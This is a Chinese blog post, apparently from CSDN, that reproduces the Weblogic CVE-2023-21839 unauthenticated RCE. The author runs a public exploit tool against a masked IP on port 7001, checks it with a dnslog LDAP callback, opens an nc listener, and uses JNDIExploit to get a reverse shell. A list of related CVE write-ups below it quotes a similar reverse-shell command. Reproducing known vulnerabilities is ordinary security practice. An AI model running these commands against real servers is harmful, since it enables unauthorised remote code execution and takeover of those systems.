CVE-2023-21839 Weblogic未授权RCE

最新推荐文章于 2024-10-16 20:46:36 发布

番茄酱料

最新推荐文章于 2024-10-16 20:46:36 发布

阅读量1.4k

点赞数

CC 4.0 BY-SA版权

分类专栏： CVE 文章标签： web安全网络安全

本文链接：https://blog.youkuaiyun.com/bring_coco/article/details/132550882

CVE 专栏收录该内容

13 篇文章

订阅专栏

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog：

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

在这里插入图片描述

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

在这里插入图片描述
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

在这里插入图片描述

这样就成功弹回了shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

番茄酱料

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析

牛叫兽的测试学习和分享

06-02

1万+

CVE-2023-33246 漏洞复现及分析

CVE-2023-32233 Linux kernel

sash1mi

05-16

2069

近日，研究人员发现了Linux内核的NetFilter框架中的新漏洞（CVE-2023-32233）。该漏洞可被本地用户用于将权限提升为root，并完全控制系统。问题的根源在于是如何处理批处理请求的，经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态，从而获得更高权限。该漏洞影响多个Linux内核版本，包括当前的稳定版本v6.3.1。漏洞原文。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2023-0215

qq_39933800的博客

06-14

3867

生产版本：5.5。

CVE-2023-29489 cPanel XSS漏洞分析研究

蚁景网安学院

05-04

2559

前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响，请及时联系作者，望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件，是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件；提供了足够强大和相当完整的主机管理功能，诸如：Webmail ...

CVE-2023-34541 LangChain 任意命令执行

蚁景网安学院

06-27

1439

漏洞简介LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中，由于load_prompt函数加载提示文件时未对加载内容进行安全过滤，攻击者可通过构造包含恶意命令的提示文件，诱导用户加载该文件，即可造成任意系统命令执行。漏洞复现在项目下编写 test.pyfromlangchain.promptsimportload_prompt if__name...

CVE-2023-21839 weblogic rce漏洞复现

wutiangui的博客

11-04

2605

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显，即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。

vulhub中Weblogic未授权远程代码执行漏洞复现 (CVE-2023-21839)

yougexiaojiuguan的博客

03-10

507

漏洞复现过程的记录

Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

qq_69775412的博客

08-09

922

Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作，当JDK版本过低或本地存在javaSerializedData时，这可能会导致RCE漏洞。

Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)

qq_62987084的博客

10-16

1274

带你了解 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)

N！Weblogic CVE-2023-21839 RCE

潇湘信安的博客

07-18

320

Weblogic CVE-2023-21839/CVE-2023-21931/CVE-2023-21979 一键检测工具，这是来自长亭xray的代码，该漏洞扫描已集成到新版本xray中。

CVE-2023-34541 LangChain 任意命令执行

YJ_12340的博客

06-27

1322

LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中，由于load_prompt函数加载提示文件时未对加载内容进行安全过滤，攻击者可通过构造包含恶意命令的提示文件，诱导用户加载该文件，即可造成任意系统命令执行。

[春秋云镜] CVE-2023-2130

m0_73649671的博客

04-22

1775

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

CVE-2023-33246 RCE漏洞复现

七堇年的博客

06-08

3465

在RocketMQ 5.1.0及以下版本在一定条件下，会存在远程命令执行风险；由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证，攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。

CVE-2023-33246命令执行复现分析

蚁景网安学院

06-16

1101

简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力，同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...

CVE-2023-22809复现（Rot5pider安全团队）

weixin_52763014的博客

04-08

3923

在复现过程中，遇到了编辑器的版本问题，vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数，但是换了一个环境的ubuntu下的vim8.1就可以执行，具体问题不是很清楚，可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名，第二是etc下的一个随意文件（这里具体哪些能行哪些不能行，我也不知道，我测试的vim和xml都可以执行，多试试）保存退出，然后 su xxx切换到用户中。

CVE-2023-32233 （LINUX内核权限提升漏洞）

m0_65354386的博客

07-06

2074

Linux内核版本v5.14 — v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞，由于在nft_verdict_init（）函数中，允许正值作为hook判决中的丢弃错误，因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时，nf_hook_slow（）函数可能会导致双重释放漏洞，从而本地低权攻击者可利用该漏洞将权限提升为root，对目标进行恶意攻击。目前该漏洞已经修复，受影响用户可通过升级系统或禁用受影响的 nf_tables 内核模块可以缓解此漏洞。

CVE-2023-23752：Joomla未授权访问漏洞复现

薛定谔嘚喵博客

09-01

1891

Joomla是一个免费的开源内容管理系统（CMS），允许用户构建网站和在线应用程序。它于 2005 年首次发布，此后成为最受欢迎的 CMS 平台之一，为全球数百万个网站提供支持。在 Joomla！ 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。

CVE-2023-27363 FOXIT PDF READER与EDITOR任意代码执行漏洞复现

热爱学习，喜欢折腾！

05-21

1435

福昕软件注册于国家科技部批准建立的十二个国家火炬计划软件产业基地之一的福州软件园和北京中关村高科技园区。公司专注于电子文档技术的研究和开发，拥有一套完全自有知识产权的PDF核心技术实现，提供PDF从生成、编辑、加工、搜索、显示、打印等一整套处理流程的解决方案，是国内为数不多的面向全球市场的基础软件开发商之一。

CVE-2023-21839远程代码执行漏洞

刘家华(游戏开发)

05-01

1779

weblogic CVE-2023-21839、CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。

CVE-2023-7106